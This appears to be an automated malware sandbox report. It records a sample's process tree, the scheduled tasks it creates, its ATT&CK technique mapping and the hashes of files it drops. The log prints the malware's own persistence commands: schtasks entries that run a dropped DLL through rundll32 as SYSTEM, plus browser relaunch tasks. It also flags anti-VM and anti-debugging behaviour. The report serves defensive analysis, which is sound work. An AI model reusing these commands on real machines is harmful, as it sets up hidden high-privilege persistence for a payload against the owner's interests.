C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NetXkRqHZJDfE2" /F /xml "C:\ProgramData\mMAjWdbxOIjSziVB\ryHsRjs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YkvMZvjGAPbigdKuX2" /F /xml "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\XEhkJXN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nQHiQOLyvgcbJIDARWU2" /F /xml "C:\Program Files (x86)\qpZxqHvFKXpRC\YtKGQuF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EJKQCvUwFyvoZzoaf" /SC once /ST 09:03:41 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\heXdjphsLYtTYYrU\uKNvtiBi\iKcojhd.dll\",#1 /tAsite_idoYH 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EJKQCvUwFyvoZzoaf"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UDYkg1" /SC once /ST 01:00:51 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "UDYkg1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HFFLY1" /SC once /ST 06:28:43 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HFFLY1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HFFLY1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UDYkg1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qXnxKrbPbFSTFetyh"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\uKNvtiBi\iKcojhd.dll",#1 /tAsite_idoYH 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\uKNvtiBi\iKcojhd.dll",#1 /tAsite_idoYH 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EJKQCvUwFyvoZzoaf"3⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd492eab58,0x7ffd492eab68,0x7ffd492eab782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1920 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1976 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3352 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3820 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4308 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5012 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4288 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4560 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5540 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3184 --field-trial-handle=2372,i,11649769697983797266,8902904602649819674,131072 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd491946f8,0x7ffd49194708,0x7ffd491947182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,3926081170139813378,6332160731483427998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3f21055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
6Impair Defenses
3Disable or Modify Tools
2Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD5faaa83b9bd1747294ea682f45754d1f9
SHA1769d2f8a946e7d70caf6ffc1b3c82a941eb31c12
SHA2562bc2ecc2787d1f76c9a9bb7ea9d5a8211287e6da7a2400e6ed3124f20910d3de
SHA512f8f880a748dab39b0913af9351e047f71c26568b38ea0727653586885a62f44be2ecc3d4082ce8d51671844b22af3ebab41013577d1a1c25e0fef1a6e9b94cc4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD5a251e7d8920ad0ae50087d3903f218d1
SHA189a40725b1fec22d61561b2286720638ac0f6625
SHA2566045f9f01ec3f769a595569f236cec5f057170f13aa5c7f8f01df1cd687725d5
SHA5120b3c16211e1da01608cab5853c907f5c061d22aad2f83aa990fd5e27b08cca8147c0b0f02af9c91e10b7dd8f9d658360a0d73900b0c101fd2a6758386007bc7c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
168B
MD5b366606bc29b8c88c631387ec1c4d148
SHA118f6f418826358a1166f0525ada80728244eba39
SHA25696faf20bfbc22a4ea67ffe358ec76272c3349aa0a0ff1ab6540e767f603a98c9
SHA51210f9f4929ad040e81a204f38342c2b96b1ff0c5814336a5c91e1b8ce4200c69e59c73b47af9e9bada6588d6b7e76ae5aa84985ee2540587be42de41fc3b4e477
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD5e5723d089be8dbb442a2b883738a88d7
SHA152835145b29522101e5b53dda547d65859cc3c70
SHA2565e54ca21765aec769e473e5b1102c6f0fa3532e5c14d06312861b7686c493340
SHA512d6091f6f563e3d54d4fa0c533c96ad2b7904c3fb921e8d74e2bd19e5c5f73f0a04f81bfa980be351b9f9c713ff15afc304f10c15cf9f411de242c1cf7d928b8d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjnniijcjakoaghpedjpcfkoclplenf\3.0_0\_metadata\verified_contents.jsonFilesize
1KB
MD5ada17322ff1c9dbf585c9e924cb82874
SHA1afd6293b0db4883557888a8a85ddeb188670f9f0
SHA256d498ab2f781b870559f4753d25844c6d518eed4a7fab5a2699497cbce652cb6e
SHA51216def210c406cffcd6fa0a5b17a879f8f0620234048a568bccb5ee75a46616ba02b5457ac6106fce8d21cb0b4bdec9201093167415d6952458e59860c4aed7e6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1Filesize
264KB
MD562ce6ca155b3217da6c660a362dcabfb
SHA1a3a140cc8c541490826d50a91896ea54bcc267cc
SHA256f952fc93595c58874e06b210b703caf4b9fe3b317e0e972d40c42a26a7a6d041
SHA512be2aad08c8c5df710bc9a31ca9478a471d776d55cb36ac30ee73e36eb22a2e11c04b56f04c07db717b9fc902125bbf7ad480ba31d1783291e204f79a49db3b77
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\HistoryFilesize
152KB
MD51a10964b8a374c0a9e5aa231fffaa39f
SHA1c679c62efa227594c75ee4a5ad32ff92f560ab35
SHA25642559c463de1329ec764f1e8be5b1356a8fb34c7162ad4048e57122d15f8c1f3
SHA512b5cfa8dc4b2dab545857231020e058098e554ce1942b5b653dc83a041032bc36efa832644e8cfc794a30a7f2f2ccba62d9471cdb5e94e79f40c841bba56c51c6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjnniijcjakoaghpedjpcfkoclplenf\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
4KB
MD51530ba08118ef8c2a403b30c349e216f
SHA116e411a2bfe7d6e53dcd1cc674ec738337ddd505
SHA256f62a15f58ee3b18d4dade1ec9c09b9d8617508fcc1d30b16c126479fa4d1b991
SHA512b17a8c2408c119d76366c2eab8bc92b24d0fae96f53bba88ccbef495648ce1b8f9a9309d928021cc4dc81306439467476a4acd09ebb823f9bfa4093db387672c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
4KB
MD5fcd19dbcad807a27ff7756ec16f7d9f8
SHA1b887341b4a67d644cc5333ebd10d4828b072dff5
SHA25653ffef5747aee04eaf5ae5d27e1c2bec8de48c5ccf0324cab97c630ba9b276d0
SHA512fb50a4e5cfa35fb3a4971f65f6ea9af2053c2805684f0268ac09f327364cfd0482598e01bc3e95ee28dab75fb1808a62413c61e9daac0ef5742e0fe83cc94224
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
4KB
MD50acb001e933ae7e234f32d03a25bd13f
SHA1ce4f7bd5951cb6546347fc6b9a783e6f017ea62e
SHA256cf5f37262667cfc7480b350369ae9813fae5624f3ab0c568bf05f1ca05bde647
SHA51286d8ae69fb496b6cd0f6961eb1141aea1b58599a1849eae29349dfafebb8a462a3fffd90d7694fa1360e32174fd0507d7781bb49d0969dc4dc729a6f8d6275e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
4KB
MD5b1252cd641a8a8462eb7e8127f461e9f
SHA1211f842bab51d22b971fe1c789859d74b887792a
SHA256825123256e68fc4a010b26b6eab9fc4d3e5b13690e221e6580157839ebab3447
SHA512cfad4ec69e4d7bbffde8dffbaf0364fbca2c0501b18ba8d9859cf1db3264815225cc0055fea3d0d37c91bce68e8b0dabc62452dec73215a000d66b5bd07a1531
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD58209f73f015af64492e19b6f232e108a
SHA16b9d18f266763eb76d41891935d09be6851af119
SHA256dac992c723d51e6f7d22c4144b61a76d28da16ff7a06f3589a023fa7d8ec48c7
SHA512f450acbe24a872339f82dca96a1cbfb76f8a587344f11a5f9a49d0050460982a58af1f769f09de80245cb5f3d3a56b176a9ea19b9f78ac758bf17100647af843
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
859B
MD58a1b4e742a8fcd9839a94133d5d8bbee
SHA1a66e60a9df8213cecc279744c21880804d357408
SHA25612f81a5e4540500b431340d920bb94a863852b06b0b93c1b33d3cc00b0dbeece
SHA512d4e726a656042c7d954642d428880d75f978817ed066b1f16a5d570d5efd0d5882c3729636fb3aaaf58f07cb08fcf70af365cff1e167cd650de3af5fa86fb183
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
859B
MD53e9bf89dfed87acbe08bfa5e4aaee16f
SHA1bd2289d7e1a523b5fa4addf8dfbc905ff3afe845
SHA256b4fb2c1e184805396e75080eb4f95041eb7018870570a0de676de2eebf6bf590
SHA5123f3646d2972db66e31845edcd7f2d12e17a615e9f095e45a9742f0df124d1d0c99d5e1395e6fcdd92fdadc42b991599512d08410eca58604fccb67ed53972887
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5bc85d28102699a8f0170466df8f9822f
SHA1e49a042bd319acb41509863cb9e0189e4c6fd50d
SHA256ce8583c23957f854ab017eb324f71488d846d597bbe1af6d14903e5671ac245f
SHA5126697538a539b2d5a36a379d731c6f19fffe0320f587742f9b2f2e6f6ec815d6ab1d61147de418e6011dd569c76f5428fdc590677d2795accf14e6bf84ca7c63b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD51651513de07d2e86a83356c41f5c21f7
SHA19a861b267bec72d9cf4d516d76d22d28ead2a3da
SHA256857ea6f6005d3bf529eb04d9edab959586d867657bf2a39afe8cfe939bd8cd07
